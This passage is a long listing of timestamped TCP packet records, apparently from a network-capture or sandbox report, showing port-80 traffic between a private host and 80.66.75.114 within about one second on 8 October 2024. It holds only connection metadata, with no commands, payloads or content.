                                                Oct 8, 2024 04:24:39.888242960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888261080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888262033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888283968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888284922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888303995 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888309002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888326883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888328075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888343096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888349056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888355970 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888381004 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888395071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888408899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888418913 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888431072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888448954 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888468027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888468027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888492107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888495922 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888515949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888516903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888530016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888545036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888552904 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888565063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888583899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888600111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888605118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888627052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888631105 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888652086 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888653040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888665915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888674974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888689041 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888696909 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888710976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888724089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888732910 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888745070 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888761997 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888766050 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888783932 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888797998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888808012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888817072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888844967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888854980 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888861895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888883114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888885021 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888894081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888914108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888922930 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888935089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888953924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888972044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888973951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888992071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888999939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889024973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889024973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889039040 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889058113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889064074 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889081001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889096022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889100075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889120102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889121056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889132023 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889142990 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889157057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889170885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889180899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889193058 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889213085 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889230967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889234066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889249086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889256001 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889275074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889281034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889296055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889313936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889316082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889338017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889338017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889355898 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889357090 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889386892 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889390945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889410973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889417887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889436007 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889439106 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889456034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889458895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889476061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889480114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889492035 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889503002 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889518023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889542103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.889549971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889564037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.889588118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.975785971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.975857973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.975918055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.975934982 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.975964069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.975980043 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976012945 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976035118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976079941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976097107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976140976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976160049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976210117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976253033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976269960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976315975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976357937 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976362944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976399899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976403952 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976448059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976490974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976492882 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976537943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976579905 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976583004 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976624012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976629019 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976674080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976717949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976721048 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976766109 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976809978 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976811886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976851940 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976861000 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976907015 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.976948977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.976950884 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977201939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.977375031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977438927 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977485895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977485895 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.977531910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977579117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977579117 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.977622032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.977626085 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977672100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977715015 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.977734089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977793932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977838039 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.977840900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977881908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.977885962 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977931023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.977972984 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.977976084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978023052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978063107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978065014 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978102922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978275061 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978341103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978382111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978401899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978446960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978488922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978492975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978533983 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978554010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978615999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978657961 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978662014 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978724957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978766918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978770018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978809118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978815079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978876114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.978921890 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.978939056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979000092 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979042053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979062080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979103088 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979121923 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979162931 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979211092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979224920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979288101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979332924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979335070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979417086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979464054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979476929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979518890 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979537964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979598045 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979644060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979660034 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979717970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979759932 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979778051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979820013 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979823112 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979885101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979928017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.979943037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.979989052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980031967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980048895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980088949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980096102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980140924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980180979 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980187893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980236053 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980279922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980279922 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980323076 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980328083 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980375051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980416059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980418921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980464935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980506897 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980508089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980546951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980552912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980597973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980638981 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980643034 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980688095 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980731010 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980731964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980771065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980777025 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980823040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980865955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980865955 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980911970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980954885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.980957985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.980998039 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981005907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981051922 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981095076 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981097937 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981142998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981187105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981188059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981235981 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981280088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981282949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981324911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981370926 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981370926 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981412888 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981412888 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981458902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981503010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981504917 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981534004 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981550932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981581926 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981611013 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981611013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981657028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981699944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981700897 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981772900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981816053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981818914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981861115 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981864929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981909990 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981946945 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.981954098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.981966019 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982000113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982043028 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982043982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982086897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982089996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982131958 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982167006 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982171059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982187033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982212067 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982219934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982264996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982266903 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982311010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982328892 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982351065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.982358932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.982400894 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.066442966 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066507101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066555023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066597939 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066616058 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.066660881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066706896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066751957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066775084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.066775084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.066804886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066852093 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.066869974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066911936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.066912889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.066972017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067015886 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067017078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067059994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067104101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067130089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067142963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067150116 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067194939 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067240953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067243099 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067280054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067290068 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067332029 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067336082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067373037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067400932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067436934 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067466974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067508936 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067513943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.067547083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.067965031 CEST804973880.66.75.114192.168.2.6
